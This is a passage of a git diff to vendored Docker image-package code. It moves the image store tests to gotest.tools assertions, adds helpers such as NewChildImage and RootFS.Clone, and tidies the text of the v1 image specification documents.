-		t.Fatal("Expected error for setting metadata for unknown ID.")
-	}
+	assert.Check(t, is.ErrorContains(err, "failed to get digest"))
 
 	_, err = store.GetMetadata(id3, "tkey")
-	if err == nil {
-		t.Fatal("Expected error for getting metadata for unknown ID.")
-	}
-}
-
-func TestFSMetadataGetSet(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	testMetadataGetSet(t, fs)
-}
-
-func TestFSDelete(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	testDelete(t, fs)
-}
-
-func TestFSWalker(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	testWalker(t, fs)
+	assert.Check(t, is.ErrorContains(err, "failed to get digest"))
 }
 
 func TestFSInvalidWalker(t *testing.T) {
-	tmpdir, err := ioutil.TempDir("", "images-fs-store")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpdir)
-	fs, err := NewFSStoreBackend(tmpdir)
-	if err != nil {
-		t.Fatal(err)
-	}
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
 
-	fooID, err := fs.Set([]byte("foo"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	fooID, err := store.Set([]byte("foo"))
+	assert.Check(t, err)
 
-	if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, "sha256/foobar"), []byte("foobar"), 0600)
+	assert.Check(t, err)
 
 	n := 0
-	err = fs.Walk(func(id digest.Digest) error {
-		if id != fooID {
-			t.Fatalf("Invalid walker ID %q, expected %q", id, fooID)
-		}
+	err = store.Walk(func(id digest.Digest) error {
+		assert.Check(t, is.Equal(fooID, id))
 		n++
 		return nil
 	})
-	if err != nil {
-		t.Fatalf("Invalid data should not have caused walker error, got %v", err)
-	}
-	if n != 1 {
-		t.Fatalf("Expected 1 walk initialization, got %d", n)
-	}
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(1, n))
 }
 
-func testGetSet(t *testing.T, store StoreBackend) {
+func TestFSGetSet(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
 	type tcase struct {
 		input    []byte
 		expected digest.Digest
@@ -258,15 +159,13 @@ func testGetSet(t *testing.T, store StoreBackend) {
 
 	randomInput := make([]byte, 8*1024)
 	_, err := rand.Read(randomInput)
-	if err != nil {
-		t.Fatal(err)
-	}
-	// skipping use of digest pkg because its used by the implementation
+	assert.Check(t, err)
+
+	// skipping use of digest pkg because it is used by the implementation
 	h := sha256.New()
 	_, err = h.Write(randomInput)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+
 	tcases = append(tcases, tcase{
 		input:    randomInput,
 		expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))),
@@ -274,83 +173,72 @@ func testGetSet(t *testing.T, store StoreBackend) {
 
 	for _, tc := range tcases {
 		id, err := store.Set([]byte(tc.input))
-		if err != nil {
-			t.Fatal(err)
-		}
-		if id != tc.expected {
-			t.Fatalf("Expected ID %q, got %q", tc.expected, id)
-		}
-	}
-
-	for _, emptyData := range [][]byte{nil, {}} {
-		_, err := store.Set(emptyData)
-		if err == nil {
-			t.Fatal("Expected error for nil input.")
-		}
+		assert.Check(t, err)
+		assert.Check(t, is.Equal(tc.expected, id))
 	}
 
 	for _, tc := range tcases {
 		data, err := store.Get(tc.expected)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if bytes.Compare(data, tc.input) != 0 {
-			t.Fatalf("Expected data %q, got %q", tc.input, data)
-		}
+		assert.Check(t, err)
+		assert.Check(t, is.DeepEqual(tc.input, data))
 	}
+}
+
+func TestFSGetUnsetKey(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
 
 	for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} {
 		_, err := store.Get(key)
-		if err == nil {
-			t.Fatalf("Expected error for ID %q.", key)
-		}
+		assert.Check(t, is.ErrorContains(err, "failed to get digest"))
 	}
+}
 
+func TestFSGetEmptyData(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
+	for _, emptyData := range [][]byte{nil, {}} {
+		_, err := store.Set(emptyData)
+		assert.Check(t, is.ErrorContains(err, "invalid empty data"))
+	}
 }
 
-func testDelete(t *testing.T, store StoreBackend) {
+func TestFSDelete(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
 	id, err := store.Set([]byte("foo"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+
 	id2, err := store.Set([]byte("bar"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	err = store.Delete(id)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	_, err = store.Get(id)
-	if err == nil {
-		t.Fatalf("Expected getting deleted item %q to fail", id)
-	}
+	assert.Check(t, is.ErrorContains(err, "failed to get digest"))
+
 	_, err = store.Get(id2)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	err = store.Delete(id2)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+
 	_, err = store.Get(id2)
-	if err == nil {
-		t.Fatalf("Expected getting deleted item %q to fail", id2)
-	}
+	assert.Check(t, is.ErrorContains(err, "failed to get digest"))
 }
 
-func testWalker(t *testing.T, store StoreBackend) {
+func TestFSWalker(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
 	id, err := store.Set([]byte("foo"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+
 	id2, err := store.Set([]byte("bar"))
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	tcases := make(map[digest.Digest]struct{})
 	tcases[id] = struct{}{}
@@ -361,24 +249,22 @@ func testWalker(t *testing.T, store StoreBackend) {
 		n++
 		return nil
 	})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(2, n))
+	assert.Check(t, is.Len(tcases, 0))
+}
 
-	if n != 2 {
-		t.Fatalf("Expected 2 walk initializations, got %d", n)
-	}
-	if len(tcases) != 0 {
-		t.Fatalf("Expected empty unwalked set, got %+v", tcases)
-	}
+func TestFSWalkerStopOnError(t *testing.T) {
+	store, cleanup := defaultFSStoreBackend(t)
+	defer cleanup()
+
+	id, err := store.Set([]byte("foo"))
+	assert.Check(t, err)
 
-	// stop on error
-	tcases = make(map[digest.Digest]struct{})
+	tcases := make(map[digest.Digest]struct{})
 	tcases[id] = struct{}{}
 	err = store.Walk(func(id digest.Digest) error {
-		return errors.New("")
+		return errors.New("what")
 	})
-	if err == nil {
-		t.Fatalf("Exected error from walker.")
-	}
+	assert.Check(t, is.ErrorContains(err, "what"))
 }
diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go
index 29a990a556..7e0646f072 100644
--- a/vendor/github.com/docker/docker/image/image.go
+++ b/vendor/github.com/docker/docker/image/image.go
@@ -1,13 +1,17 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
 	"encoding/json"
 	"errors"
 	"io"
+	"runtime"
+	"strings"
 	"time"
 
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/layer"
+	"github.com/opencontainers/go-digest"
 )
 
 // ID is the content-addressable ID of an image.
@@ -29,25 +33,25 @@ func IDFromDigest(digest digest.Digest) ID {
 
 // V1Image stores the V1 image configuration.
 type V1Image struct {
-	// ID a unique 64 character identifier of the image
+	// ID is a unique 64 character identifier of the image
 	ID string `json:"id,omitempty"`
-	// Parent id of the image
+	// Parent is the ID of the parent image
 	Parent string `json:"parent,omitempty"`
-	// Comment user added comment
+	// Comment is the commit message that was set when committing the image
 	Comment string `json:"comment,omitempty"`
-	// Created timestamp when image was created
+	// Created is the timestamp at which the image was created
 	Created time.Time `json:"created"`
 	// Container is the id of the container used to commit
 	Container string `json:"container,omitempty"`
 	// ContainerConfig is the configuration of the container that is committed into the image
 	ContainerConfig container.Config `json:"container_config,omitempty"`
-	// DockerVersion specifies version on which image is built
+	// DockerVersion specifies the version of Docker that was used to build the image
 	DockerVersion string `json:"docker_version,omitempty"`
-	// Author of the image
+	// Author is the name of the author that was specified when committing the image
 	Author string `json:"author,omitempty"`
 	// Config is the configuration of the container received from the client
 	Config *container.Config `json:"config,omitempty"`
-	// Architecture is the hardware that the image is build and runs on
+	// Architecture is the hardware that the image is built and runs on
 	Architecture string `json:"architecture,omitempty"`
 	// OS is the operating system used to build and run the image
 	OS string `json:"os,omitempty"`
@@ -92,6 +96,24 @@ func (img *Image) RunConfig() *container.Config {
 	return img.Config
 }
 
+// BaseImgArch returns the image's architecture. If not populated, defaults to the host runtime arch.
+func (img *Image) BaseImgArch() string {
+	arch := img.Architecture
+	if arch == "" {
+		arch = runtime.GOARCH
+	}
+	return arch
+}
+
+// OperatingSystem returns the image's operating system. If not populated, defaults to the host runtime OS.
+func (img *Image) OperatingSystem() string {
+	os := img.OS
+	if os == "" {
+		os = runtime.GOOS
+	}
+	return os
+}
+
 // MarshalJSON serializes the image to JSON. It sorts the top-level keys so
 // that JSON that's been manipulated by a push/pull cycle with a legacy
 // registry won't end up with a different key order.
@@ -110,15 +132,63 @@ func (img *Image) MarshalJSON() ([]byte, error) {
 	return json.Marshal(c)
 }
 
+// ChildConfig is the configuration to apply to an Image to create a new
+// Child image. Other properties of the image are copied from the parent.
+type ChildConfig struct {
+	ContainerID     string
+	Author          string
+	Comment         string
+	DiffID          layer.DiffID
+	ContainerConfig *container.Config
+	Config          *container.Config
+}
+
+// NewChildImage creates a new Image as a child of this image.
+func NewChildImage(img *Image, child ChildConfig, platform string) *Image {
+	isEmptyLayer := layer.IsEmpty(child.DiffID)
+	var rootFS *RootFS
+	if img.RootFS != nil {
+		rootFS = img.RootFS.Clone()
+	} else {
+		rootFS = NewRootFS()
+	}
+
+	if !isEmptyLayer {
+		rootFS.Append(child.DiffID)
+	}
+	imgHistory := NewHistory(
+		child.Author,
+		child.Comment,
+		strings.Join(child.ContainerConfig.Cmd, " "),
+		isEmptyLayer)
+
+	return &Image{
+		V1Image: V1Image{
+			DockerVersion:   dockerversion.Version,
+			Config:          child.Config,
+			Architecture:    img.BaseImgArch(),
+			OS:              platform,
+			Container:       child.ContainerID,
+			ContainerConfig: *child.ContainerConfig,
+			Author:          child.Author,
+			Created:         imgHistory.Created,
+		},
+		RootFS:     rootFS,
+		History:    append(img.History, imgHistory),
+		OSFeatures: img.OSFeatures,
+		OSVersion:  img.OSVersion,
+	}
+}
+
 // History stores build commands that were used to create an image
 type History struct {
-	// Created timestamp for build point
+	// Created is the timestamp at which the image was created
 	Created time.Time `json:"created"`
-	// Author of the build point
+	// Author is the name of the author that was specified when committing the image
 	Author string `json:"author,omitempty"`
-	// CreatedBy keeps the Dockerfile command used while building image.
+	// CreatedBy keeps the Dockerfile command used while building the image
 	CreatedBy string `json:"created_by,omitempty"`
-	// Comment is custom message set by the user when creating the image.
+	// Comment is the commit message that was set when committing the image
 	Comment string `json:"comment,omitempty"`
 	// EmptyLayer is set to true if this history item did not generate a
 	// layer. Otherwise, the history item is associated with the next
@@ -126,7 +196,19 @@ type History struct {
 	EmptyLayer bool `json:"empty_layer,omitempty"`
 }
 
-// Exporter provides interface for exporting and importing images
+// NewHistory creates a new history struct from arguments, and sets the created
+// time to the current time in UTC
+func NewHistory(author, comment, createdBy string, isEmptyLayer bool) History {
+	return History{
+		Author:     author,
+		Created:    time.Now().UTC(),
+		CreatedBy:  createdBy,
+		Comment:    comment,
+		EmptyLayer: isEmptyLayer,
+	}
+}
+
+// Exporter provides interface for loading and saving images
 type Exporter interface {
 	Load(io.ReadCloser, io.Writer, bool) error
 	// TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error
@@ -141,7 +223,7 @@ func NewFromJSON(src []byte) (*Image, error) {
 		return nil, err
 	}
 	if img.RootFS == nil {
-		return nil, errors.New("Invalid image JSON, no RootFS key.")
+		return nil, errors.New("invalid image JSON, no RootFS key")
 	}
 
 	img.rawJSON = src
diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go
index 525023b813..981be0b68c 100644
--- a/vendor/github.com/docker/docker/image/image_test.go
+++ b/vendor/github.com/docker/docker/image/image_test.go
@@ -1,10 +1,17 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
 	"encoding/json"
+	"runtime"
 	"sort"
 	"strings"
 	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/layer"
+	"github.com/google/go-cmp/cmp"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 const sampleImageJSON = `{
@@ -17,22 +24,15 @@ const sampleImageJSON = `{
 	}
 }`
 
-func TestJSON(t *testing.T) {
+func TestNewFromJSON(t *testing.T) {
 	img, err := NewFromJSON([]byte(sampleImageJSON))
-	if err != nil {
-		t.Fatal(err)
-	}
-	rawJSON := img.RawJSON()
-	if string(rawJSON) != sampleImageJSON {
-		t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", sampleImageJSON, rawJSON)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(sampleImageJSON, string(img.RawJSON())))
 }
 
-func TestInvalidJSON(t *testing.T) {
+func TestNewFromJSONWithInvalidJSON(t *testing.T) {
 	_, err := NewFromJSON([]byte("{}"))
-	if err == nil {
-		t.Fatal("Expected JSON parse error")
-	}
+	assert.Check(t, is.Error(err, "invalid image JSON, no RootFS key"))
 }
 
 func TestMarshalKeyOrder(t *testing.T) {
@@ -43,9 +43,7 @@ func TestMarshalKeyOrder(t *testing.T) {
 			Architecture: "c",
 		},
 	})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.Check(t, err)
 
 	expectedOrder := []string{"architecture", "author", "comment"}
 	var indexes []int
@@ -57,3 +55,71 @@ func TestMarshalKeyOrder(t *testing.T) {
 		t.Fatal("invalid key order in JSON: ", string(b))
 	}
 }
+
+func TestImage(t *testing.T) {
+	cid := "50a16564e727"
+	config := &container.Config{
+		Hostname:   "hostname",
+		Domainname: "domain",
+		User:       "root",
+	}
+	os := runtime.GOOS
+
+	img := &Image{
+		V1Image: V1Image{
+			Config: config,
+		},
+		computedID: ID(cid),
+	}
+
+	assert.Check(t, is.Equal(cid, img.ImageID()))
+	assert.Check(t, is.Equal(cid, img.ID().String()))
+	assert.Check(t, is.Equal(os, img.OperatingSystem()))
+	assert.Check(t, is.DeepEqual(config, img.RunConfig()))
+}
+
+func TestImageOSNotEmpty(t *testing.T) {
+	os := "os"
+	img := &Image{
+		V1Image: V1Image{
+			OS: os,
+		},
+		OSVersion: "osversion",
+	}
+	assert.Check(t, is.Equal(os, img.OperatingSystem()))
+}
+
+func TestNewChildImageFromImageWithRootFS(t *testing.T) {
+	rootFS := NewRootFS()
+	rootFS.Append(layer.DiffID("ba5e"))
+	parent := &Image{
+		RootFS: rootFS,
+		History: []History{
+			NewHistory("a", "c", "r", false),
+		},
+	}
+	childConfig := ChildConfig{
+		DiffID:  layer.DiffID("abcdef"),
+		Author:  "author",
+		Comment: "comment",
+		ContainerConfig: &container.Config{
+			Cmd: []string{"echo", "foo"},
+		},
+		Config: &container.Config{},
+	}
+
+	newImage := NewChildImage(parent, childConfig, "platform")
+	expectedDiffIDs := []layer.DiffID{layer.DiffID("ba5e"), layer.DiffID("abcdef")}
+	assert.Check(t, is.DeepEqual(expectedDiffIDs, newImage.RootFS.DiffIDs))
+	assert.Check(t, is.Equal(childConfig.Author, newImage.Author))
+	assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config))
+	assert.Check(t, is.DeepEqual(*childConfig.ContainerConfig, newImage.ContainerConfig))
+	assert.Check(t, is.Equal("platform", newImage.OS))
+	assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config))
+
+	assert.Check(t, is.Len(newImage.History, 2))
+	assert.Check(t, is.Equal(childConfig.Comment, newImage.History[1].Comment))
+
+	assert.Check(t, !cmp.Equal(parent.RootFS.DiffIDs, newImage.RootFS.DiffIDs),
+		"RootFS should be copied not mutated")
+}
diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go
index 7b24e3ed1e..84843e10c6 100644
--- a/vendor/github.com/docker/docker/image/rootfs.go
+++ b/vendor/github.com/docker/docker/image/rootfs.go
@@ -1,10 +1,10 @@
-package image
+package image // import "github.com/docker/docker/image"
 
 import (
 	"runtime"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/layer"
+	"github.com/sirupsen/logrus"
 )
 
 // TypeLayers is used for RootFS.Type for filesystems organized into layers.
@@ -34,6 +34,14 @@ func (r *RootFS) Append(id layer.DiffID) {
 	r.DiffIDs = append(r.DiffIDs, id)
 }
 
+// Clone returns a copy of the RootFS
+func (r *RootFS) Clone() *RootFS {
+	newRoot := NewRootFS()
+	newRoot.Type = r.Type
+	newRoot.DiffIDs = append(r.DiffIDs)
+	return newRoot
+}
+
 // ChainID returns the ChainID for the top layer in RootFS.
 func (r *RootFS) ChainID() layer.ChainID {
 	if runtime.GOOS == "windows" && r.Type == typeLayersWithBase {
diff --git a/vendor/github.com/docker/docker/image/spec/README.md b/vendor/github.com/docker/docker/image/spec/README.md
new file mode 100644
index 0000000000..9769af781a
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/spec/README.md
@@ -0,0 +1,46 @@
+# Docker Image Specification v1.
+
+This directory contains documents about Docker Image Specification v1.X.
+
+The v1 file layout and manifests are no longer used in Moby and Docker, except in `docker save` and `docker load`.
+
+However, v1 Image JSON (`application/vnd.docker.container.image.v1+json`) has been still widely
+used and officially adopted in [V2 manifest](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md)
+and in [OCI Image Format Specification](https://github.com/opencontainers/image-spec).
+
+## v1.X rough Changelog
+
+All 1.X versions are compatible with older ones.
+
+### [v1.2](v1.2.md)
+
+* Implemented in Docker v1.12 (July, 2016)
+* The official spec document was written in August 2016 ([#25750](https://github.com/moby/moby/pull/25750))
+
+Changes:
+
+* `Healthcheck` struct was added to Image JSON
+
+### [v1.1](v1.1.md)
+
+* Implemented in Docker v1.10 (February, 2016)
+* The official spec document was written in April 2016 ([#22264](https://github.com/moby/moby/pull/22264))
+
+Changes:
+
+* IDs were made into SHA256 digest values rather than random values
+* Layer directory names were made into deterministic values rather than random ID values
+* `manifest.json` was added 
+
+### [v1](v1.md)
+
+* The initial revision
+* The official spec document was written in late 2014 ([#9560](https://github.com/moby/moby/pull/9560)), but actual implementations had existed even earlier
+
+
+## Related specifications
+
+* [Open Containers Initiative (OCI) Image Format Specification v1.0.0](https://github.com/opencontainers/image-spec/tree/v1.0.0)
+* [Docker Image Manifest Version 2, Schema 2](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md)
+* [Docker Image Manifest Version 2, Schema 1](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-1.md) (*DEPRECATED*)
+* [Docker Registry HTTP API V2](https://docs.docker.com/registry/spec/api/)
diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md
index 83f138011d..de74d91a19 100644
--- a/vendor/github.com/docker/docker/image/spec/v1.1.md
+++ b/vendor/github.com/docker/docker/image/spec/v1.1.md
@@ -88,7 +88,7 @@ This specification uses the following terms:
         A tag serves to map a descriptive, user-given name to any single image
         ID. Tag values are limited to the set of characters
         <code>[a-zA-Z0-9_.-]</code>, except they may not start with a <code>.</code>
-        or <code>-</code> character. Tags are limited to 127 characters.
+        or <code>-</code> character. Tags are limited to 128 characters.
     </dd>
     <dt>
         Repository
@@ -99,7 +99,7 @@ This specification uses the following terms:
         <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
         component of the name. A repository name is made up of slash-separated
         name components, optionally prefixed by a DNS hostname. The hostname
-        must follow comply with standard DNS rules, but may not contain
+        must comply with standard DNS rules, but may not contain
         <code>_</code> characters. If a hostname is present, it may optionally
         be followed by a port number in the format <code>:8080</code>.
         Name components may contain lowercase characters, digits, and
@@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity.
         container using the image. This field can be <code>null</code>, in
         which case any execution parameters should be specified at creation of
         the container.
-
         <h4>Container RunConfig Field Descriptions</h4>
-
         <dl>
             <dt>
                 User <code>string</code>
@@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.
                 <p>The username or UID which the process in the container should
                 run as. This acts as a default value to use when the value is
                 not specified when creating a container.</p>
-
                 <p>All of the following are valid:</p>
-
                 <ul>
                     <li><code>user</code></li>
                     <li><code>uid</code></li>
@@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
                     <li><code>uid:group</code></li>
                     <li><code>user:gid</code></li>
                 </ul>
-
                 <p>If <code>group</code>/<code>gid</code> is not specified, the
                 default group and supplementary groups of the given
                 <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
@@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity.
                 <code>map[string]struct{}</code> and is represented in JSON as
                 an object mapping its keys to an empty object. Here is an
                 example:
-
 <pre>{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }</pre>
-
                 Its keys can be in the format of:
                 <ul>
                     <li>
@@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
                     </li>
                 </ul>
                 with the default protocol being <code>"tcp"</code> if not
-                specified.
-
-                These values act as defaults and are merged with any specified
-                when creating a container.
+                specified. These values act as defaults and are merged with any
+                specified when creating a container.
             </dd>
             <dt>
                 Env <code>array of strings</code>
@@ -367,7 +358,6 @@ whitespace. It has been added to this example for clarity.
         The rootfs key references the layer content addresses used by the
         image. This makes the image config hash depend on the filesystem hash.
         rootfs has two subkeys:
-
         <ul>
           <li>
             <code>type</code> is usually set to <code>layers</code>.
@@ -376,10 +366,7 @@ whitespace. It has been added to this example for clarity.
             <code>diff_ids</code> is an array of layer content hashes (<code>DiffIDs</code>), in order from bottom-most to top-most.
           </li>
         </ul>
-
-
         Here is an example rootfs section:
-
 <pre>"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -396,7 +383,6 @@ whitespace. It has been added to this example for clarity.
         <code>history</code> is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         <ul>
           <li>
             <code>created</code>: Creation time, expressed as a ISO-8601 formatted
diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md
index 6c641cafec..2ea3feec92 100644
--- a/vendor/github.com/docker/docker/image/spec/v1.2.md
+++ b/vendor/github.com/docker/docker/image/spec/v1.2.md
@@ -88,7 +88,7 @@ This specification uses the following terms:
         A tag serves to map a descriptive, user-given name to any single image
         ID. Tag values are limited to the set of characters
         <code>[a-zA-Z0-9_.-]</code>, except they may not start with a <code>.</code>
-        or <code>-</code> character. Tags are limited to 127 characters.
+        or <code>-</code> character. Tags are limited to 128 characters.
     </dd>
     <dt>
         Repository
@@ -99,7 +99,7 @@ This specification uses the following terms:
         <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
         component of the name. A repository name is made up of slash-separated
         name components, optionally prefixed by a DNS hostname. The hostname
-        must follow comply with standard DNS rules, but may not contain
+        must comply with standard DNS rules, but may not contain
         <code>_</code> characters. If a hostname is present, it may optionally
         be followed by a port number in the format <code>:8080</code>.
         Name components may contain lowercase characters, digits, and
@@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity.
         container using the image. This field can be <code>null</code>, in
         which case any execution parameters should be specified at creation of
         the container.
-
         <h4>Container RunConfig Field Descriptions</h4>
-
         <dl>
             <dt>
                 User <code>string</code>
@@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.
                 <p>The username or UID which the process in the container should
                 run as. This acts as a default value to use when the value is
                 not specified when creating a container.</p>
-
                 <p>All of the following are valid:</p>
-
                 <ul>
                     <li><code>user</code></li>
                     <li><code>uid</code></li>
@@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
                     <li><code>uid:group</code></li>
                     <li><code>user:gid</code></li>
                 </ul>
-
                 <p>If <code>group</code>/<code>gid</code> is not specified, the
                 default group and supplementary groups of the given
                 <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
@@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity.
                 <code>map[string]struct{}</code> and is represented in JSON as
                 an object mapping its keys to an empty object. Here is an
                 example:
-
 <pre>{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }</pre>
-
                 Its keys can be in the format of:
                 <ul>
                     <li>
@@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
                     </li>
                 </ul>
                 with the default protocol being <code>"tcp"</code> if not
-                specified.
-
-                These values act as defaults and are merged with any specified
-                when creating a container.
+                specified. These values act as defaults and are merged with
+                any specified when creating a container.
             </dd>
             <dt>
                 Env <code>array of strings</code>
@@ -364,7 +355,6 @@ whitespace. It has been added to this example for clarity.
                             <li><code>["CMD", arg1, arg2, ...]</code> : exec arguments directly</li>
                             <li><code>["CMD-SHELL", command]</code> : run command with system's default shell</li>
                         </ul>
-
                         The test command should exit with a status of 0 if the container is healthy,
                         or with 1 if it is unhealthy.
                     </dd>
@@ -387,12 +377,10 @@ whitespace. It has been added to this example for clarity.
                         The number of consecutive failures needed to consider a container as unhealthy.
                     </dd>
                 </dl>
-
                 In each case, the field can be omitted to indicate that the
-                value should be inherited from the base layer.
-
-                These values act as defaults and are merged with any specified
-                when creating a container.
+                value should be inherited from the base layer. These values act
+                as defaults and are merged with any specified when creating a
+                container.
             </dd>
             <dt>
                 Volumes <code>struct</code>
@@ -426,7 +414,6 @@ whitespace. It has been added to this example for clarity.
         The rootfs key references the layer content addresses used by the
         image. This makes the image config hash depend on the filesystem hash.
         rootfs has two subkeys:
-
         <ul>
           <li>
             <code>type</code> is usually set to <code>layers</code>.
@@ -435,10 +422,7 @@ whitespace. It has been added to this example for clarity.
             <code>diff_ids</code> is an array of layer content hashes (<code>DiffIDs</code>), in order from bottom-most to top-most.
           </li>
         </ul>
-
-
         Here is an example rootfs section:
-
 <pre>"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -455,7 +439,6 @@ whitespace. It has been added to this example for clarity.
         <code>history</code> is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         <ul>
           <li>
             <code>created</code>: Creation time, expressed as a ISO-8601 formatted
@@ -478,9 +461,7 @@ whitespace. It has been added to this example for clarity.
             filesystem).
           </li>
         </ul>
-
-Here is an example history section:
-
+        Here is an example history section:
 <pre>"history": [
   {
     "created": "2015-10-31T22:22:54.690851953Z",
diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md
index 57a599b8ff..c1415947f1 100644
--- a/vendor/github.com/docker/docker/image/spec/v1.md
+++ b/vendor/github.com/docker/docker/image/spec/v1.md
@@ -17,12 +17,10 @@ This specification uses the following terms:
     <dd>
         Images are composed of <i>layers</i>. <i>Image layer</i> is a general
         term which may be used to refer to one or both of the following:
-
         <ol>
             <li>The metadata for the layer, described in the JSON format.</li>
             <li>The filesystem changes described by a layer.</li>
         </ol>
-
         To refer to the former you may use the term <i>Layer JSON</i> or
         <i>Layer Metadata</i>. To refer to the latter you may use the term
         <i>Image Filesystem Changeset</i> or <i>Image Diff</i>.
@@ -92,7 +90,7 @@ This specification uses the following terms:
         often referred to as a tag as well, though it strictly refers to the
         full name of an image. Acceptable values for a tag suffix are
         implementation specific, but they SHOULD be limited to the set of
-        alphanumeric characters <code>[a-zA-z0-9]</code>, punctuation
+        alphanumeric characters <code>[a-zA-Z0-9]</code>, punctuation
         characters <code>[._-]</code>, and MUST NOT contain a <code>:</code>
         character.
     </dd>
@@ -105,7 +103,7 @@ This specification uses the following terms:
         <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
         component of the name. Acceptable values for repository name are
         implementation specific, but they SHOULD be limited to the set of
-        alphanumeric characters <code>[a-zA-z0-9]</code>, and punctuation
+        alphanumeric characters <code>[a-zA-Z0-9]</code>, and punctuation
         characters <code>[._-]</code>, however it MAY contain additional
         <code>/</code> and <code>:</code> characters for organizational
         purposes, with the last <code>:</code> character being interpreted
@@ -244,9 +242,7 @@ Here is an example image JSON file:
         container using the image. This field can be <code>null</code>, in
         which case any execution parameters should be specified at creation of
         the container.
-
         <h4>Container RunConfig Field Descriptions</h4>
-
         <dl>
             <dt>
                 User <code>string</code>
